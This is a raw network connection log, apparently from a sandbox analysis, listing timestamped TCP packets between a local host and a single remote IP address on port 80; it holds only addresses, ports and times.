Apr 25, 2024 09:43:16.253999949 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.254018068 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.254050016 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.254070044 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.257810116 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.390822887 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.391092062 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.392996073 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.525929928 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.526114941 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.659208059 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.369342089 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.369472980 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.369599104 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.369653940 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.369709969 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.369765997 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.377700090 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.377764940 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378060102 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378118992 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378256083 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378307104 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378369093 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378417969 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378478050 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378525972 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378541946 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378591061 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.378712893 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.378757954 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.502410889 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.502480984 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.502723932 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.502737999 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.502785921 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.502826929 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.511888981 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.640045881 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.640167952 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.642261028 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.770682096 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:17.770742893 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:17.897929907 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.636362076 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.636396885 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.636408091 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.636512041 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.636552095 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.657228947 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.657313108 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659353971 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659403086 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659478903 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659529924 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659600019 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659650087 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659692049 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659737110 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659744024 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659785032 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.659809113 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.659852028 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.763818979 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.763835907 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.763883114 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.763901949 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.780276060 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.907318115 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:18.907417059 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:18.909478903 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.036382914 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.036571980 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.163528919 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.899868965 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.900007010 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.900007963 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.900019884 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.900054932 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.900080919 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.908771992 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.908830881 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909132004 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909178019 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909281969 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909324884 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909337044 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909378052 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909456968 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909499884 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909539938 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909552097 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:19.909584999 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:19.909637928 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.026959896 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:20.027028084 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.027132034 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:20.027178049 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.027205944 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:20.027251959 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.068854094 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.194586992 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:20.194700003 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.366841078 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.493288994 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:20.493375063 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:20.619172096 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.323591948 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.323753119 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.323901892 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.323916912 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.332727909 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.332771063 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.332813025 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.332911968 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.332971096 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.333028078 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.333203077 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.333250999 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.333631992 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.333915949 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.333971024 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.355298042 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.449776888 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.449872971 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.454886913 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.454953909 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.465320110 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.465333939 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.465393066 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.465426922 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.476134062 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.476197958 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.476210117 CEST	80	49814	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.476253986 CEST	49814	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.514003992 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.640183926 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.640256882 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.643851042 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.769839048 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:21.769915104 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:21.895548105 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.610361099 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.610389948 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.610476017 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.610519886 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.610537052 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.610560894 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.610589027 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.610630989 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619410992 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619473934 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619698048 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619725943 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619740963 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619741917 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619771004 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619801044 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619894028 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619910955 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.619936943 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.619966984 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.737473965 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.737493992 CEST	80	49815	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.737540007 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.737540007 CEST	49815	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.751446962 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.882688999 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:22.882759094 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:22.887850046 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.018949986 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.019001007 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.149563074 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.840818882 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.840920925 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.840938091 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.840995073 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.849293947 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.849344015 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.849658966 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.849699020 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.849827051 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.849854946 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.849877119 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.849904060 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.849951982 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.849997044 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.850003004 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.850039959 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.850044966 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.850079060 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.850155115 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.850193977 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.972177982 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.972326040 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.972343922 CEST	80	49816	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:23.972374916 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.972403049 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.972403049 CEST	49816	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:23.975779057 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:24.105668068 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:24.106029987 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:24.107779980 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:24.237663031 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:24.240031958 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:24.370117903 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.077003002 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.077130079 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.077562094 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.077621937 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.077693939 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.077747107 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.087455988 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.087512016 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.087805033 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.087954998 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.087986946 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.088035107 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.088088989 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.088143110 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.088255882 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.088293076 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.088300943 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.088345051 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.088403940 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.088452101 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.207067013 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.207117081 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.207210064 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.207233906 CEST	80	49817	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.207267046 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.207268000 CEST	49817	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.210196018 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.346514940 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.346615076 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.348509073 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.481714010 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:25.481884956 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:25.614806890 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.456254959 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.456276894 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.456341028 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.456367016 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.456367016 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.456446886 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.468352079 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.468403101 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.468800068 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.468844891 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.468929052 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.468967915 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.468976021 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.469012976 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.469103098 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.469127893 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.469142914 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.469144106 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.469166040 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.469193935 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.589474916 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.589498997 CEST	80	49818	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.589555979 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.589627028 CEST	49818	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.606789112 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.736234903 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.736433029 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.739379883 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.869071960 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:26.869136095 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:26.998919964 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.705368042 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.705421925 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.705519915 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.705595016 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.705595970 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.705595970 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715054989 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715116978 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715293884 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715348959 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715435028 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715435028 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715540886 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715590954 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715682030 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715730906 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715744019 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715787888 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.715795040 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.715837955 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.838391066 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.838452101 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.838505983 CEST	80	49819	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.838552952 CEST	49819	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.857908964 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.985840082 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:27.986097097 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:27.987761021 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.115269899 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.115480900 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.242614031 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.941181898 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.941246033 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.941328049 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.941401005 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949131966 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949287891 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949371099 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949419975 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949536085 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949593067 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949678898 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949727058 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949820995 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949872017 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949891090 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949930906 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.949939013 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949971914 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:28.949980974 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:28.950030088 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.068789005 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:29.068833113 CEST	80	49820	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:29.068872929 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.068916082 CEST	49820	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.084618092 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.210463047 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:29.210608959 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.212593079 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.338251114 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:29.338315010 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:29.464052916 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.139460087 CEST	80	49821	45.77.223.48	192.168.2.4
